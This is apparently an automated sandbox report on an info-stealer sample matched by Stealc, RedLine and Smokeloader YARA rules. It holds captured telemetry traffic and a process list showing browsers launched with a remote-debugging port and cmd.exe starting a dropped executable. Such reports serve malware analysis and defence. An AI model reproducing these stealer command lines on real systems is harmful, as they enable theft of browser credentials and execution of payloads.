2024-11-02 16:56:49 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:49 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 14de8335-b01e-003e-77d2-2c8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165649Z-16547b76f7fwvr5dhC1DFW2c9400000000xg000000000p0c x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:49 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.7	49897	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:49 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:49 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:49 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 898deafb-901e-0048-35d2-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165649Z-16547b76f7fj5p7mhC1DFWf8w4000000013g000000002cxh x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:49 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.7	49898	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:49 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:49 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:49 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165649Z-16547b76f7fmbrhqhC1DFWkds800000000zg000000009b1h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:49 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.7	49899	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:49 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:49 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:49 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 8f5c374f-101e-0046-61d2-2c91b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165649Z-16547b76f7f9bs6dhC1DFWt3rg00000000u000000000kb3n x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:49 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.7	49903	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:50 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:50 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:50 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 35437e01-301e-0052-4f62-2c65d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165650Z-r159446fcd7tc5j5hC1DFWrhs000000001vg000000008chy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-02 16:56:50 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.7	49904	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:50 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:50 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:50 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: 6b634123-201e-0051-6532-2c7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165650Z-176bd8f9bc56w2rshC1DFWd88n00000002t0000000003c51 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:50 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.7	49908	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:50 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:50 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:50 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: ef9eb64e-501e-00a3-5d76-2cc0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165650Z-r159446fcd786fxnhC1DFWh5ac00000001ug0000000048fs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:50 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.7	49912	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:50 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:50 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:50 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: 09d23618-001e-000b-0deb-2b15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165650Z-16547b76f7fj897nhC1DFWdwq400000000qg00000000gp6d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:50 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.7	49913	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:50 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:50 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:50 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 524abde6-c01e-007a-10d2-2cb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165650Z-16547b76f7fj5p7mhC1DFWf8w400000000y000000000hcr2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:50 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Target ID:	0
Start time:	12:56:12
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\DbMBWMxoNv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DbMBWMxoNv.exe"
Imagebase:	0x400000
File size:	665'088 bytes
MD5 hash:	F4F514D2D0E346E0E6989AEBA521F777
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1909388825.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1909336167.0000000002CA2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:56:27
Start date:	02/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:56:27
Start date:	02/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2268,i,9271446851340455151,13328863685662980914,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:51:57
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	true
Commandline:	"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x4b0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:51:57
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2804 --field-trial-handle=2496,i,9443240005397704202,6850762102566127394,262144 /prefetch:3
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:51:58
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	14:51:58
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:3
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	14:52:03
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6796 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:52:03
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7040 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:52:26
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingEBFBKKJECA.exe"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
